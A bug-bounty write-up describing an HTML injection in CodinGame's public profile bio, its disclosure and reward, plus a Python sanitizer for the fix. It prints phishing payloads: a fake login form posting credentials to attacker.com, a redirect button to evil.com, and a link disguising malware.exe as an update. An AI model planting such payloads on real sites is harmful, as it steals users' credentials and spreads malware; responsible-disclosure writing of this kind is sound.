- bug-bounty
- web-security
- html-injection
How I got on CodinGame's Hall of Fame with an HTML injection
First paid bounty: HTML in a profile bio that turned into a phishing surface on a real domain.
April 2026 log. The actual back and forth with the program was in September 2024.
Context
We had some CodinGame exercises to do for class. I wasn't really into it, so I spent the time clicking through my account settings instead of actually solving the puzzles.
CodinGame is a pretty big platform (millions of devs, companies use it for hiring), so even a "dumb" bug can have a lot of reach. I wasn't even looking for anything specific, just messing around with my profile.
The find
I noticed the "About me" box on the profile page. I tried putting a basic HTML tag in there, saved it, and when I reloaded the page, the browser just rendered it. No filtering, no escaping.

Why it mattered
A heading tag on its own is just a visual mess, but once arbitrary HTML gets rendered, you can build a fake login form that looks like it belongs to the site.
```html
<h1>Confirm Login to see content</h1>
<img src="https://media.glassdoor.com/sqll/1149702/codingame-squareLogo-1675265034218.png"
     alt="Logo" style="width:200px;height:auto;">
<form method="POST" action="https://attacker.com/collect.php">
  Username: <input type="text" name="username" /><br/>
  Password: <input type="password" name="passwd" /><br/>
  <input type="submit" value="Login" />
</form>
```
Since it's on codingame.com, you get the real SSL certificate and the trusted domain in the address bar.

The real issue was that profiles are public. You don't need to be logged in to see them. You could just send a link to someone, they'd see a login prompt on the official site, and they'd probably just type their credentials without thinking twice.
Other payloads
I included a few other things in the report to show what else was possible:
Styled redirect buttons:
<a href="https://evil.com"
style="display:inline-block;padding:10px 20px;
background-color:#007bff;color:white;
text-decoration:none;border-radius:5px;">
Go to CodinGame
</a>
File downloads (using the download attribute to make a binary look like an official update):
<a href="https://attacker.com/malware.exe"
download="CodinGame_Update.exe"
style="display:inline-block;padding:10px 20px;
background-color:#007bff;color:white;
text-decoration:none;border-radius:5px;">
Download CodinGame Application
</a>
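For the fix side, here is an added example in Python (my own code, not the author's and not CodinGame's actual patch): either escape the bio as text on output, or, if some formatting is wanted, run it through an allowlist sanitizer that drops form elements together with their content and strips every attribute except an http(s) href, so none of the three payloads above come out the other end. The tag and attribute lists are my assumptions about what a bio needs.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br"}  # kept; their attributes are not
# Dropped together with their content, so a fake form's labels don't linger as text.
DROP_WITH_CONTENT = {"script", "style", "form", "iframe", "object", "textarea", "select", "button"}

def escape_bio(bio: str) -> str:
    """Simplest fix: render the field as text, so a '<h1>' displays literally."""
    return html.escape(bio, quote=True)

class BioSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.skip_depth = 0  # >0 while inside a dropped container

    @staticmethod
    def safe_attrs(tag, attrs) -> str:
        # Only <a href> with an http(s) scheme survives; style=, on*=, download= and
        # action= are never copied, so an anchor can't be dressed up as a button.
        href = dict(attrs).get("href") or ""
        if tag == "a" and urlparse(href).scheme in ("http", "https"):
            return f' href="{html.escape(href)}" rel="nofollow noopener"'
        return ""  # unsafe scheme: inert <a> without href, so its </a> still matches

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            self.skip_depth += tag in DROP_WITH_CONTENT  # nested dropped container
        elif tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
        elif tag in ALLOWED_TAGS:  # other tags (h1, img, input) lose the tag, keep the text
            self.out.append(f"<{tag}{self.safe_attrs(tag, attrs)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= tag in DROP_WITH_CONTENT
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:  # text is always re-escaped on the way out
            self.out.append(html.escape(data))

def sanitize_bio(bio: str) -> str:
    p = BioSanitizer()
    p.feed(bio)
    p.close()
    return "".join(p.out)
```

Whether even plain links belong in a public bio is a product call; `escape_bio` is the safe default and the sanitizer is the compromise when formatting is a feature.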
Disclosure
I sent the report on September 9, 2024. I had to explain why this was more than just a "customizable field" issue (which is usually out of scope). I argued that being able to harvest credentials or push downloads on unauthenticated users was a different level of risk.
The response
They actually took it seriously after some internal debate:
"It's been a long debate with devs. Despite being out of scope we found that we may want to add some level of protection: 'I guess we could remove input tags at least.' As such I can provide a reward."
Got the bounty on September 27 and my name on the Hall of Fame on October 1.

Closing
I think the report worked because I didn't just say "there is HTML injection." I showed how it could be used for phishing and downloads. Usually you should stick to the scope, but if you find something that actually puts people at risk, it's worth explaining it clearly and seeing what they say.
Also, I got my first bounty because I was procrastinating on my homework. Not a bad trade.
